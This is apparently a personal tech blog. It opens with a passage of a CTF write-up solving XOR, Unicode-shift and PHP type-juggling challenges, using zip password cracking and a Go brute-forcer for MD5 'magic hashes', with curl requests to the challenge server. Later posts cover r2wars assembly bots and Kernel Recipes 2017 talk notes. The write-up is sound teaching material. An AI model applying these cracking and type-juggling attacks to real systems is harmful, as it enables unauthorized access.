    for(j=0; j<pass.length; j++){
        var n= pass.charCodeAt(j);
        hash += ((n-j+33)^31025); 
    }
    if (hash == 529387) {
        var Secret =""+"\x4f\x01\x13\x1e\x09\x59\x34\x09\x0b\x05\x26\x53\x31\x41\x5a\x18\x0e\x53\x1d\x15\x1c\x10\x11\x13\x5b\x06\x16\x69\x15\x29\x55\x1d\x55\x5d\x06\x1d\x0e\x1f\x0c\x14\x13\x5b\x06\x16\x69\x1e\x2a\x40\x5a\x1d\x18\x53\x19\x06\x00\x16\x02\x56\x0a\x1f\x16\x69\x07\x30\x14\x1b\x0a\x5d\x07\x1b\x08\x06\x13\x02\x56\x0b\x05\x06\x3b\x53\x33\x55\x16\x10\x19\x16\x1b\x47\x1f\x00\x47\x15\x13\x0b\x1f\x25\x16\x2b\x53\x1f\x45\x52\x1b\x1d\x0a\x1f\x5b"+"";
        var s=Kod(Secret, pass);
        document.write (s); 
    } else {
        alert ('Wrong password!'); 
    } 
}

The function f() is called on form submit. It first computes a custom checksum of the password, and if it matches, it tries to use to decrypt a secret with Kod(). This custom checksum contains a core XOR, that is run on very character, before adding to the total sum. We know that there's a good chance that each character's charCode will be < 127 (in the ASCII space), so we can actually use the checksum to deduce the size of the password (the upper bits being more significant):

529387/31025 = 17.06323932312651

It's 17 characters !

The decode function is Kod(); it is run as a fixed-key XOR with the password as key, and the Secret variable as message. This should be crypto 101 (well, almost), and if not, you can follow the cryptopals challenges to learn how to do that. Since I wasn't so certain that I could do it on my own in a short-enough time, I just reused someone else's solution with the key size I already found. It didn't give a perfect decrypt, but it was close enough to help me find the flag.

In retrospect, I could have also used the fact that the start of the flags is always the same ('sigsegv{'), and then decode it by hand, but this was good enough.

In the JS console of your browser, you can see how to decrypt the secret:

Kod(Secret, flag)
"<html>Bravo tu as trouve le flag, utilise le mot de passe que tu as trouve pour valider le challenge</html>"

Un nouveau dialecte

This challenge, was in the "Crypto" section. Wait, didn't we have crypto in the two last challenges as well ?

The goal was to decode this new "dialect":

ȃǹǷȃǵǷȆȋǜǑǣǤǕǗǑǓǕǣǤǠǑǣǣǙǖǑǓǙǜǕȍ

As I do in most challenges, I put the content in a file (named "file", I also lack imagination), loaded it in ipython3, and started visualizing and massaging the data

Python 3.6.6 (default, Jul 19 2018, 14:25:17) 
Type 'copyright', 'credits' or 'license' for more information
IPython 6.4.0 -- An enhanced Interactive Python. Type '?' for help.

In [1]: a=open("file", "rb").read()
In [2]: print(a)
b'\xc8\x83\xc7\xb9\xc7\xb7\xc8\x83\xc7\xb5\xc7\xb7\xc8\x86\xc8\x8b\xc7\x9c\xc7\x91\xc7\xa3\xc7\xa4\xc7\x95\xc7\x97\xc7\x91\xc7\x93\xc7\x95\xc7\xa3\xc7\xa4\xc7\xa0\xc7\x91\xc7\xa3\xc7\xa3\xc7\x99\xc7\x96\xc7\x91\xc7\x93\xc7\x99\xc7\x9c\xc7\x95\xc8\x8d'

In [3]: print(str(a, encoding="utf-8"))
ȃǹǷȃǵǷȆȋǜǑǣǤǕǗǑǓǕǣǤǠǑǣǣǙǖǑǓǙǜǕȍ
In [4]: b = [ a[i:i+2] for i in range(0, len(a), 2) ]
In [5]: b
Out[5]:
[b'\xc8\x83',
 b'\xc7\xb9',
 b'\xc7\xb7',
 b'\xc8\x83',
 b'\xc7\xb5',
 b'\xc7\xb7',
 b'\xc8\x86',
 b'\xc8\x8b',
 b'\xc7\x9c',
 b'\xc7\x91',
 b'\xc7\xa3',
 b'\xc7\xa4',
 b'\xc7\x95',
 b'\xc7\x97',
 b'\xc7\x91',
 b'\xc7\x93',
 b'\xc7\x95',
 b'\xc7\xa3',
 b'\xc7\xa4',
 b'\xc7\xa0',
 b'\xc7\x91',
 b'\xc7\xa3',
 b'\xc7\xa3',
 b'\xc7\x99',
 b'\xc7\x96',
 b'\xc7\x91',
 b'\xc7\x93',
 b'\xc7\x99',
 b'\xc7\x9c',
 b'\xc7\x95',
 b'\xc8\x8d']

I first analyzed the UTF-8 encoded codepoints (as binary data), but was soon lucky, and found that the Unicode codepoints (not their UTF-8 encoded version) were in fact all in the same range, hinting to a simple Caesar cipher. Here is the final visualizing and decoding program:

#!/usr/bin/env python3
# coding: utf-8

s=open("file", "r").read()

for i in s:
    print("{} {:04x}: {:16b}".format(i, ord(i), ord(i)), end='\t')
    x = ord(i) - 0x100 - 144
    print("{:09b} {} {}".format(x, x, chr(x)))

print("".join([chr(ord(i) - 400) for i in s]))

Note that this was very easy because I'm used to launch python3 by default, which is unicode-native; ord() behaves as it should. Anyone used to python2, would be in a bit more pain, since the characters would have been interpreted byte-by-byte.

La simplicité

Under the "simplicity" title, this one might be the longest to solve. To start, you're given a "simple" website, that looks like this:

$ curl  http://51.158.73.218:8880/
<html>
    <head>
        <title>Un site simple</title></title>
    </head>
    <body>
        <center><iframe width="560" height="315" src="https://www.youtube.com/embed/2bjk26RwjyU?rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></center>
<!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->
<!-- Un formulaire c'était pas assez simple donc on en a pas mis -->
</body>
</html>

I did quite a lot of exploration on this: I tried different http methods (to no avail), I discovered that the name of the file was "index.php". I tried a few standard "admin" pages. Then I moved on to the other challenges, keeping this one last.

When I came back to it, I had an epiphany. The solution to unlock the first step was simple, in retrospect (as announced):

$ curl  http://51.158.73.218:8880/robots.txt
backup.zip

Oh. So I download this zip file, (backup here), and it's a password-protected zip containing an index.php:

$ unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password:

No solution here, one has to use bruteforce to crack this zip. I download john the ripper, and extract the crackable hash:

$ ./JohnTheRipper/run/zip2john  backup.zip  > john.hash
ver 2.0 efh 5455 efh 7875 backup.zip->index.php PKZIP Encr: 2b chk, TS_chk, cmplen=453, decmplen=680, crc=70C7CB88
$ cat john.hash
backup.zip:$pkzip2$1*2*2*0*1c5*2a8*70c7cb88*0*43*8*1c5*70c7*bce4*01f43e1d0eb0118661d22e480e38736de7c321d3ac1cf086601594c4ab54ebc7af0ad5ea01c8b64bda21aee19533a09808c0e7892fdb08f8df9644eeefc9aabe92b3c1cb10fb981090365d55229da292afba120f388d25a56e52c91b42af567d2ee897c5bd979b673a99fe187e4064f438165815d29fad2d1a7edbdf46ee2ff99afb546e1626cbb57897b6a108a3fb108495ec508243bffe3d050efe1b9aadf700695f8aca72e4e1977f827702ec5840fbe1559e0ac1e646323ea051ee69257030c3b33d305d9ab6f70dc600a2d4cc07482df8d95e4dd8741082540e3b2ec988eab2c99a595927eb31cc589d8bd28068ddd375588c668f52f5896d45e42de0d1933dc390a5c2a5ee3b8d30b91b763bb77892651dd9241bf03dde65ad8b6acee2bcb3942dc800aa3350d2f894c32fc0dcba5164d9db59dd09044d28b44181a19398d27c64b65bd1c8e4cdce21eeac513172d340ca4b54baf5570921dc182e3b02b0ff8d0b0ac4070a0715f6300f8fb99ffdc665270cc98fae8d28f3727742b79e2bd9392f35e4564a243234e9cf502beb0e3572c2c83a33b68c56cc317aece233f99a02838c9c562ebb3271d58aa6bb653b43803c9188b1c737cfa827c533ff301e453fb111*$/pkzip2$:::::backup.zip

Then I run john on it:

$ ./JohnTheRipper/run/john --show john.hash 
backup.zip:passw0rd:::::backup.zip

1 password hash cracked, 0 left

This runs almost instantly; so the password is "passw0rd". We can unzip the file, and get the source code of index.php. This is the same page as before, with the more interesting parts shown here:

<?php
include "auth.php";
?>
[…]
<?php
        if(isset($_POST["h1"]))
        {
                $h1 = md5($_POST["h1"] . "Shrewk");
                echo "h1 vaut: ".$h1."</br>";
                if($h1 == "0")
                {
                                echo "<!--Bien joué le flag est ".$flag."-->";
                }
        }
?>
[…]

So, there's a POST parameter h1, which is hashed with a "Shrewk" salt, and then compared to the string "0". Wait, what ? How can md5() return "0" ?

The php documentation doesn't mention anything of the sort. But you can quickly find that the comparison operation "==" isn't recommended to compare strings, because of type juggling. Indeed, a string like "1e3", will be resolved to the integer 1000, for example. A secure string comparison should use "===".

So, this might be the core of the challenge. Maybe what we need is an md5 hash string that starts with many "0", then "e" or "E", and then is followed by only digits ? It looks like we need to crack some md5 as well.

I installed hashcat, and started looking at the documentation. I found a lot of ways to parametrize the input to be hashed, but no way to filter the hashes in output to look like a given format. I attempted to generate a lot of hashes in hope of finding a random password that would match one of them, with the given program:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>



int main() {
        uint64_t i;
        unsigned int seed;
        for (i = 0; i < (1<< 29); i++)
                printf("0e%010d%010d%010d:Shrewk\n", rand_r(&seed), rand_r(&seed), rand_r(&seed));
}

This writes data in the hashcat format hash:salt. I used it to generate a lot of potential hashes, but hashcat needs to load all of them into memory, and whether you have 1GB or 1TB of RAM, this is still is many order of magnitudes smaller than the space I want to explore. So while hashcat was running, I started working on a more exhaustive exploration.

I decided to use a go program, because this is an embarrassingly parallel problem, and will be much easier to crack with go routines. First, here is the match function, to test if a hex-encoded hash has the format we want:

func match(x string) bool {
        i := 0
        for x[i] == '0' {
                i++
        }
        if i < 1 {
                return false
        }
        if x[i] != 'e' && x[i] != 'E' {
                return false
        }
        for i++; i < len(x) && (x[i] >= '0' && x[i] <= '9'); i++ {
        }
        return i == len(x)
}

And its corresponding test:

func TestMatch(t *testing.T) {
        samples := []struct {
                v   string
                ret bool
        }{
                {"000e1234123456781234567812345678", true},
                {"0a0e1234123456781234567812345678", false},
                {"00E01234123456781234567812345678", true},
                {"00EE1234123456781234567812345678", false},
                {"00E01234123456781234567812345ab8", false},
                {"0e000000000000000000000000000000", true},
        }
        for i := range samples {
                if match(samples[i].v) != samples[i].ret {
                        t.Fatal("Error: ", samples[i].v, samples[i].ret)
                }
        }
}

This is the only function that was tested because of how core it was to finding a solution. Note that it might have been faster to work directly on byte data instead of converting the md5 to a hex-encoded string, but I found it an acceptable compromise to keep the code readable and correct.

The rest of the code is just an exhaustive exploration of password space (with the salt), with a recursive core.

func core2(share, max int) {
        const alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwyxz.;/-{}"
        const salt = "Shrewk"
        for size := share; ; size += max {
                if size == 0 {
                        continue
                }
                b := make([]byte, size+len(salt))

                for c := 0; c < size; c++ {
                        b[c] = alphabet[0]
                }
                for c := 0; c < len(salt); c++ {
                        b[c+len(b)-len(salt)] = salt[c]
                }
                var charloop func(int, func())
                charloop = func(i int, f func()) {
                        for c := 0; c < len(alphabet); c++ {
                                b[i] = alphabet[c]
                                if i > 0 {
                                        charloop(i-1, f)
                                } else {
                                        f()
                                }
                        }
                }
                //recursion is much easier
                charloop(size-1, func() {
                        h := md5.Sum(b)
                        he := hex.EncodeToString(h[:])
                        if match(he) {
                                fmt.Println("Found match: ", string(b), he)
                                os.Exit(0)
                                return
                        }
                })
        }
}

Particular attention was given on minimizing the allocations, to reduce the performance impact. This is why the core function works on a single []byte slice. The hex.EncodeToString does many allocations though.

The main function does the work sharing, in a naive way: the size of the password is used to slice the work between goroutines:

func main() {
        c := make(chan struct{})
        for i := 0; i < runtime.NumCPU(); i++ {
                go func() {
                        core2(i, runtime.NumCPU())
                        c <- struct{}{}
                        os.Exit(0)
                }()
        }
        <-c
}

This means, that the program will be non-deterministic, depending on the number of cores we have, and the particular scheduling of goroutines.

This code finds a password on my 2012 laptop in about 3 minutes.

$ time ./crack 
Found match:  KgeM5000Shrewk 0e957579856924481004771378652894

real    2m45.885s
user    10m28.607s
sys     0m2.147s

And let's test this password we found:

$ curl -s -d h1=KgeM5000  http://51.158.73.218:8880/index.php |grep flag
h1 vaut: 0e957579856924481004771378652894</br><!--Bien joué le flag est sigsegv{a1a29afa647a20758e64b49d8eb453f4}--><!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->

Unsurprisingly, it was much faster on a modern 8 core Xeon; and it found another password first because of the work sharing structure :

$ curl -s -d h1=QM8.B0  http://51.158.73.218:8880/index.php |grep flag
h1 vaut: 0e893977776066512259427456189998</br><!--Bien joué le flag est sigsegv{a1a29afa647a20758e64b49d8eb453f4}--><!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->

And that's it for the challenges !

Kernel Recipes 2018 liveblog

2018-09-26T00:00:00+02:00

I had a lot of good feedback from the previous years live-blogs of the Embedded and Kernel Recipes conferences. So much in fact, that this year I'm now doing the liveblog directly on the official website of kernel recipes.

I hope you enjoy it !

I also live-tweeted my impressions of Embedded Recipes day 1 and day 2.

r2con 2018 and r2wars

2018-09-08T00:00:00+02:00

I tried something new this year, by going to r2con, a conference dedicated to radare2, a reverse engineering toolkit.

r2con

This conference is one of the most affordable security conference out there. I've used radare2 (r2) in the past, but I don't think I fully understood its philosophy until going there. The radare2 community is really focused on creating the best toolkit for analyzing, disassembling, debugging, reverse engineering software; all while keeping it fully free software.

The training was very interesting, with demos and hands-on experience.

The organization was great, and it was a sleek conference. Many thanks to the organizers.

I've had to install Telegram for the first time to participate in the local discussions, and apparently I wasn't the only one new to Telegram. I've mostly interacted with the radare2 community through IRC before (they have a bridge).

I've met many great people from all over the world; I was honestly surprised how welcoming is the community.

The conference had a single track of talks (all recorded), a CTF (capture-the-flag) game focused on reverse engineering binaries: to crack them, exploit them, etc. with radare2, as well as a little game called "r2wars", on which I spent way more time than I care to admit.

r2wars

In radare2, there's an intermediate language and VM called ESIL. It is used to emulate code, and supports many architectures. r2wars is built on top of r2's ESIL VM, but the rules limit to the following architectures: x86-32, arm-32, arm-64 and mips-32.

In r2wars, two opponents create "bots", short shellcodes, which are executed one after the other, in the same memory space, thanks to ESIL emulation. The goal is be the latest to survive; you must wipe, crash your opponent, or simply wait for your opponent to die by himself by writing or executing at invalid memory.

You upload the source code of your bot to the r2wars server through a web interface ; the server software uses rasm2, the radare2 assembler to build your bot, it launches radare2, initializes ESIL, then launches 1v1 matches in a tournament, to determine the winner.

My bots

I've dumped the source code for all my bots on github (spoilers!).

Naive approach

My very first idea was to create a self-replicating bot that would survive forever by copying itself in a loop. It took me long time to build as I was getting used to the aarch64 assembly (I mostly have experience with aarch32 and thumb).

One of the first hurdles would be that the rasm2 assembler is still quite incomplete. It does not support all arm64 addressing modes for the branch instructions, it does not support load/store pre/post-indexing; it does labels in a naive way. For example, if you give a very short name to your label (say, 'x'), it will replace all occurrences of "x" in the program; which might be an issue in arm64, since the registers are named x0 to x30.

One of the goal of the r2wars competition was to improve rasm2 and ESIL emulation in radare2. I looked at instruction encoding, finding a few references in addition to the official manual, but I couldn't figure out the post-index address encoding for ldp in a short-enough time to be useful for the competition, so I moved to the gnu assembler included in the fedora package binutils-aarch64-linux-gnu. The binary code is then converted to .hex directives for rasm2.

Once I did that, I discovered that ESIL emulation in radare2 was much more complete, and that the code I wrote behaved as expected (well, minus my bugs).

At first I attempted to make use of "combined" instructions like csel, cbz, or ldp/stp; I've mostly kept ldp/stp afterwards, since they are the instructions which can read and write the most data that at once: two 8 bytes registers, with the option to modify/increment the addressing register at the same time with the so-called pre-index (modify the register before the load/store) and post-index addressing mode (modify it after the load/store). This allowed, when repeated, to do the most damage. This is my first bot:

 adr x0, -16
 add x1, x0, endprog
 add x5, x1, endprog
 cmp x5, 1024 - 16
 csel x1, xzr, x1, gt
 add x5, x1, endprog
 add x4, x1, 16
looprog:
 ldp x2, x3, [x0, 16]!
 stp x2, x3, [x1, 16]!
 cmp x1, x5
 b.lt looprog
 br x4
endprog:
 nop

It's very naive, but it works. It copies itself in a loop, and wraps at 1024 bytes. It should never die when left a alone. The issues are numerous, but the biggest ones are that it's simply too slow, and too big, clocking at 48 bytes of useful instructions. I submitted it once, but never used it in a competition, replacing it with a better one.

Simplicity

Once I managed to build and run the official r2wars server (you need an official version of Mono for that, not the distro versions which are too old), I started writing other bots to have them compete with each other, before the official matches. I wrote a few variants of this bot:

adr x0, 68
adr x1, -4
loop:
  stp x0, x2, [x1, -16]!
  stp x1, x2, [x0, 16]!
  b loop

This bot will first get its own address + 68 (to be at the end of the reserved space by r2wars), and then will start writing groups of bytes in the up and down directions, until it died by reaching invalid memory.

And most of those simple bots weren't statistically worse than the original bot. As it was already 3am before the competition started, I decided to call it a night, and submit my initial naive approach.

Insomnia

But. I just couldn't sleep. I had so many ideas, so I got up and wrote this one quickly:

adr x0, start
mov x3, 1008
ldp x1, x2, [x0]
stp x1, x2, [x3]
br x3
start:
stp x0, x4, [x3, -16]!
stp x0, x4, [x3, -16]!
stp x0, x4, [x3, -16]!
b start

This one copies it payload at the end of the arena in only 4 instructions, jumps to it, and then the payload will just overwrite all bytes at a significantly higher rate than the other ones. I wasn't sure it would be more efficient, but I went to sleep for real.

The following morning, I ran the simulations again, and this new one was completely thrashing the others. I decided to submit it, and it was the one used in the first tournament.

The fights

It didn't fare so well during the first iteration of the tournament. It was the only arm-64 bot, mostly against x86 bots, and I didn't understand why, but it arrived in 5th of 8 position. Not too bad.

I went on to work on my next idea: a single-instruction bot, providing a much slimmer target against non-linear writes, and always writing its next instruction. It needed to be slow, to not die quickly, so I had to write only 4 bytes at once. So I changed from the wide-store stp, to the smaller str. It supported the pre-indexing addressing mode, so it could work.

But that's when I found my first ESIL bug. It turned out that ESIL arm64 emulation only implemented the pre-indexing addressing for str. I looked more into the code, and found that the ESIL VM used polish-notation instructions. It looked complicated, but I tried to understand how stp pre-indexing was implemented. I got derailed, so I missed the next r2wars tournament iteration, and didn't upload any update !

But, magically, this time, my bot had it much better. Either the other opponents evolved to algorithms that were weaker against this strategy, or the new opponents gave me more points, or simply the randomness of the initial position was more favorable; but anyway, I arrived in 3rd position this time. I got a prize for being in the top 3, and was very happy. But this was only the beginning.

Stack escape

I noticed that some opponents would continue on living after I had overwritten them. How ? They were running x86-32 code. And it turns out, I was mostly writing zeroes; which are interpreted as valid x86 instructions. This architectures has simply too many valid opcodes.

I also noticed that one of the x86-32 opponents, zutle, had a sudden weird bug: it was executing code at 0x01780xxx address. What sorcery was this ? Isn't the arena between 0 and 1024 ? It turns out, that in ESIL, that is the default initialized stack address. And it's executable! Time for a new bot.

The idea of this bot, was to copy its 4-instructions payload somewhere on the stack, live there, and wipe the whole arena from there, in a loop:

adr x0, start
mov x3, 0x7ff0
movk x3, 0x0018, lsl 16
ldp x1, x2, [x0]
stp x1, x2, [x3]
mov x5, 0
neg x0, x0
mov x1, x0
br x3
start:
stp x0, x1, [x5], 16
stp x0, x1, [x5], 16
and x5, x5, 0x3ff
b start

And this time, it would only write 0xff bytes (well, mostly), to prevent the x86 valid 0x00 opcodes. The strategy is otherwise the same. It starts at 0, and overwrites the whole arena with a post-indexed stp, and the and here checks when the end is reached (a much better idea than my initial csel-based naive approach). And it worked well, in my simulations (with r2 and r2wars from git).

But not in the tournament. In the tournament, it turns out that the post-index in the stps were simply ignored. So the bot escaped to the stack, and then basically waited at the beginning of the address space for the opponent to come being overwritten. Sometimes it would work, sometimes the opponent would kill himself, and sometimes, it would run forever. Well, not forever, since the game has a timeout of 4000 cycles (already reduced from 8000 cycles in the first round). After the timeout, a draw would happen.

The timeout shouldn't be an issue, since the timeout usually happens in less than 30 seconds... for an x86 bot. It turns out, ESIL arm64 emulation was much slower than x86, and the timeout felt like it was 10 times longer (I didn't measure). My bot was still the only arm-64 fighter at this stage (there was one arm-32, and one mips, the rest was x86-32), so I was responsible (well, with the ESIL bug in the r2 version of the organizer) for a VERY long tournament. It took ~1h15m instead of the usual ~7m.

Of course, I wasn't the only one to have this idea. Konrad had the same idea as he entered the game, and wrote an x86-32 bot with this strategy; our bots didn't meet, so we had a draw. His bot didn't have a buggy emulation, so he had less draws and arrived first. I was second, so I got another prize! Yeah !

Special mention to Dimitris who managed to be third here with a strategy that didn't use any stack escape. And he had more wins than my bot ! (I won because I had more draws).

Of course, this very long tournament iteration triggered a reaction from the organizers, and execution out of the main arena had to be forbidden. No more stack execution.

Ending

So, with the my last strategy not working anymore, I re-uploaded my first competing bot, and called it a day. I had already won top-3 twice, and I didn't need any more prizes. I tried other strategies for a while, but didn't submit them and came back to fixing ESIL emulation of str pre-index and post-index addressing. I sent a pull request to radare once it somehow worked, and went on to follow more conferences.

The next round saw my strategy being relatively bad, with place 7 over 12. Fighting bots of different architectures is sometimes a disadvantage: x86 has more compact instructions, it has an instruction to dump all registers permitting very wide writes, etc.

I still took the opportunity to update it before the last round to write 0xff instead of 0x00 to improve the win-rate against x86 bots:

adr x0, start
mov x3, 1008
neg x5, x0
mov x4, x5
ldp x1, x2, [x0]
stp x1, x2, [x3]
br x3
start:
stp x5, x4, [x3, -16]!
stp x5, x4, [x3, -16]!
stp x5, x4, [x3, -16]!
b start

I really want to thank the organizer of this tournament, skuater. He couldn't be present at r2con since he missed his flight, but still streamed the tournament, reacted to bugs we found, provided very nice support over Telegram, told us when our bots weren't building, etc. Kudos !

I didn't get to watch the last tournament of r2wars because I had to leave early. As I finish writing these lines, my plane lands in Paris. I open my phone, to see that my PR was merged. And that Konrad just sent me this picture, showing the results of the last r2wars tournament:

Kernel Recipes 2017 day 3 notes

2017-09-29T00:00:00+02:00

This is continuation of day 1 and day 2 of Kernel Recipes 2017.

Using Linux `perf` at Netflix

by Brendan Gregg

Brendan started with a ZFS on Linux case study, where it was eating 30% of the CPU resources, which it should never be doing. He started by generating a flame graph with perf, through Netflix's Vector dashboard tool. It was confirmed instantly, despite the initial hunch. This was then quickly thought to be the container teardown cleanup using lots of resources. The only issue here, is that this particular project never used ZFS. It was in fact the free code path trying to get real entropy to free empty lists. It was later fixed in ZFS.

A particular point underlined is that when profiling, you want to see everything, from the kernel, to userspace C or Java code. perf allows doing that, because it has no blind spots, is accurate and low overhead.

This is useful at Netflix, because they scale the number of instances based on the percentage of CPU usage. At Netflix scale, a small performance improvement might lead to a scale-down saving the company a lot of money. While perf can do many things, Netflix uses it to profile CPU usage 95% of the time.

perf basics

perf originated from implementation of CPU Performance Monitoring Counters (PMCs) in Linux, and supports many features.

The main workflow is to do a perf list to look at the available tracepoint events, then perf stat to count particular events. perf record allows capturing and dumping the events to the file system, perf report or perf script is used to analyze a dumped perf data. perf top can be used to look at events in real-time.

Brendan maintains a list of perf one-liners, useful to explore and learn about perf capabilities.

Brendan came up with Flame Graphs when he was profiling a MySQL issue. It's a perl script that converts input data to svg. To use it with perf, use stackcollapse-perf.pl with perf script, and feed the output into flamegraph.pl

Gotchas

An important thing is to have working stack traces and symbol resolving working. To fix stack traces you should either use frame-pointer based stack walking, libunwind or DWARF. You probably want -fno-omit-frame-pointer into your gcc option lists for C code. For Java, you might want to use perf-map-agent to do symbol resolution and de-inlining.

When you go to instruction-level, the problem is that resolution isn't really precise, so you don't really know which one you're executing. This is because of modern out-of-order CPU architecture. Intel's PEBS helps with this issue.

When using VMs, you might want to have you hypervisor (Xen, etc.) enable PMCs for your OS and handle this properly. For containers, perf might have issues finding the symbol files, since they are in a different namespace; this is fixed in 4.14.

In conclusion, there's a lot to say about perf, and this talk only scratched the surface of what's possible; Brendan pointed us to the many resources available about it online.

The Serial Device Bus

by Johan Hovold

While serial buses are ubiquitous, the TTY layer failed at modeling the associated resources with a serial line.

The TTY layer exposes a character device to userspace. It supports line discipline for switch modes, handling errors, etc.

It's possible to write drivers on top in userspace, and Johan used gpsd as example of this. But you need to know in advance the associated Port and resources aren't necessary accessible. And you lose the ability to interact with other subsystems in the kernel. Another example of this is bluetooth, where you register further devices (hci0) in order to be able to control the line-discipline and properly initialize ports.

To initialize the bluetooth, you use hciattach to configure a tty as bluetooth device, then the hci device appears, and then you use hciconfig to manage this device. The problem with this type of ldisc drivers is that you lose control over some information to userspace, and you don't have the full picture for GPIOs, and other resources for handling power management for example.

Serial Device Bus

serdev was originally written by Rob Herring; it was created as bus for UART-attached device. It was merged in 4.11, but enabled in 4.12 follwing some issues.

The new bus name is "serial"; it refers to servdev controllers and clients (or slaves). The only controller available is the TTY-port controller. The hardware description happens in the Device Tree.

serdev allows a new architecture, with simpler interaction and layering, without the need to have userspace change the mode of a TTY first, since all the necessary data is in the Device Tree. For bluetooth, this would mean hci0 would appear at dt probe time, making it possible to use hciconfig directly.

There are currently three bluetooth drivers using this infrastructure in the kernel, as well as one ethernet driver (qca_uart).

The main limitation is that it's serial-core only. While it only supports Device Tree, this is being worked on to add ACPI. Hotplug support isn't solved either. Multiplexing for supporting multiple slaves patches have been posted.

eBPF and XDP seen from the eyes of a meerkat

by Éric Leblond

Suricata is an open-source Intrusion Detection System that relies on kernel features. It starts with dumping all packets at the IP level with linux raw sockets, then does stream reconstruction and application protocol analysis. It works at 10GB/s in normal use in enterprise networks. It analyses the data, and output JSON, or even a web dashboard.

Suricata uses linux raw sockets with AF_PACKET in memory-mapped fan-out mode for multi-threaded processing.

One issue Suricata encountered was the asymmetrical hash being changed in Linux 4.2, breaking ordering so that Suricata couldn't properly analyze the streams. This was fixed later in 4.6.

eBPF

eBPF came to the rescue by enabling Suricata to customize the hash function, and then properly tag packets so that they go to the proper thread (load-balanced), hence preserving ordering.

Another issue related to load-balancing, is the big flow handling, that is hard to handle without losing packets or ordering. One solution is to discard select packets, by bypassing certain packets as soon as possible in the kernel to reduce performance impact.

Suricata implemented a new "stream depth" bypass that allows to start discarding after the flow started, while still capturing the most interesting part at the beginning.

For the kernel part of this bypass implementation, nftables did not work because it was too late in the process, after AF_PACKET handling. An eBPF filter using maps helped Suricata achieve this.

bcc didn't match Suricata requirements, so they used libbpf which is hosted inside the kernel in tools/lib/bpf. Eric says it's easy enough to use.

XDP

The eXtreme Data Path (XDP) project was started to give access to raw packet data from the network card, before it reaches the Linux network subsystem, creating an skb. You can even interact with it using an eBPF filter. This needs modified drivers, and many are already supported; in 4.12 there's even a generic driver usable for development, but less performant.

Eric started integrating XDP in Suricata, and found that it meant doing more parsing since it was raw packets. libbpf support isn't done yet either. To hand over the capture to userspace, the strategy is to use the perf event system, with its memory mapped ring buffer.

This is still a bit fresh, Eric says, but promising and very efficient.

HDMI CEC Status Report

by Hans Verkuil

The Voyager space probe sent in 1977 communicates at 1477 bits per second, and CEC is a bus that communicates at 400 bits per second, making Hans the maintainer of the slowest bus in the Kernel.

CEC is an option part of HDMI that provides high level functions and communications for Audio and Video products. It's a 1-line protocol. It has physical addresses, the TV always being 0, and inputs have others. Then there are logical addresses from 0 to 15.

Features

CEC allows waking up, shutting down a device (TV or else), switch sources, getting remote passthrough. You can tell also tell other devices the name of your device. You can also configure the Audio Return Channel (ARC) to send the audio from the sink (TV) to a device through the HDMI Ethernet pins.

Inside the kernel, the CEC framework implements most of the features. The drivers only need to implement the low-level CEC adapter operations. It handles core messages automatically, but you can also get them if you enable passthrough. If you need to assemble or decode CEC messages, there's a BSD and GPL-licensed header-only implementation in cec-funcs.h that can be used by applications. The framework driver API is pretty compact and simple to implement.

The userspace API has various messages to set a physical or logical address, set the mode of the fd, etc.

The Hotplug Detect use case is complex, since it depends on the status of the HDMI Hotplug Detect Pin (HDP). If the pin is down, some devices won't be able to send CEC messages. Some TVs turn off HPD, but still receive CEC messages. Hans says that the most reliable way to wakeup a TV is to just send a message, regardless of the HPD status. It's out-of-spec, but is the only way to make it work.

cec-ctl is the tool that implements the userspace API and allows interacting with the framework from the command line.

In kernel 4.14, many devices are now supported, including the Raspberry Pi. It can now be emulated with the vivid driver. It passed CEC 1.4 and 2.0 compliance tests. This makes Linux the only OS with built-in CEC support, Hans says.

In the pipeline, is support for many new devices, as well as a brand new cec-gpio driver allowing to do bit-banging of CEC over a GPIO. It also allows injecting errors, but this should come later.

20 years of Linux Virtual Memory

by Andrea Arcangeli

Virtual Memory(VM) is practically unlimited and costs virtually nothing, virtual pages point to physical pages, which is the real memory.

In x86, the pagetable format is a radix tree. With traditional 3 levels of pages tables you can have 256TiB of memory; with 5-level page tables, you can address 128PiB of memory, but it has a performance impact.

The VM algorithms in Linux use heuristics to solve a hard problem of using the memory as best as possible. One such choice is to have overcommit by default. Or to use all free memory as cache.

In the VM, the basic structure is struct page. It's currently 64 bytes, and is using 1.56% of all memory in a given system.

MM is the memory of a process, and is shared by threads. virtual_memory_area VMA is inside the MM. The LRU cache is combination of two lists of recently used pages, and uses an active and inactive optimum balancing algorithm. The status of those lists is visible in /proc/meminfo.

Reverse mapping of the objects (objrmap) is used as well to find reverse references of pages to processes.

There are other LRUs for anonymous and file-based mappings, or cgroups.

Trends

Automatic NUMA Balancing helps running various workloads, without having to adapt it to NUMA mode with hard bindings.

Transparent Hugepages are a way to automatically use huge pages if an application uses lots of memory, instead of manually with hugetlbfs.

The MMU notifier allows reducing page pinning, making it possible to swap-out DMAed memory with proper driver interactions.

HMM or Unified Virtual Memory allows going even furthers for GPU and seamless computing, without requiring cache-coherency.

Andrea showed auto-NUMA balancing benchmarks, and it improves transactions as much as 10%. A remark from the audience showed that in some pathological cases, the performance might actually be worse, but the feature can be disabled.

Huge Pages

With hugepages, you can go from 4KiB pages to 2MiB pages. This allows completely removing a pagetable level, and thus improving performance in some cases. But it has a cost when clearing pages, making it less cache friendly. In the last case, a huge improvement in performance was seen when clearing the faulting sub-page last, so that it's still in the cache.

Transparent Hugepage (THP) works by simply sending 2M pages when the mmap region is 2M aligned, and the request is big enough. It is tunable in /sys/kernel/mm/transparent_hugepage; it can be disabled, enabled only for madvise, or always. The THP defragmentation/compaction is also tunable.

Since Linux 4.8, it's possible to use THP with tmpfs and shmem. This is also tunable and disabled by default.

KSM and userfaultfd

Virtual memory deduplication (KSM) is practically unlimited, affecting migration during compaction for example; with KSMscale, a maximum limit is set on per-physical pages dedup, the default is 256, so that a given KSM would only be referenced by 256 virtual pages; this is tunable. Answering a question from the audience, Andrea said that if you care about cross-VM sidechannel attacks, you should probably disable KSM after disabling HyperThreading.

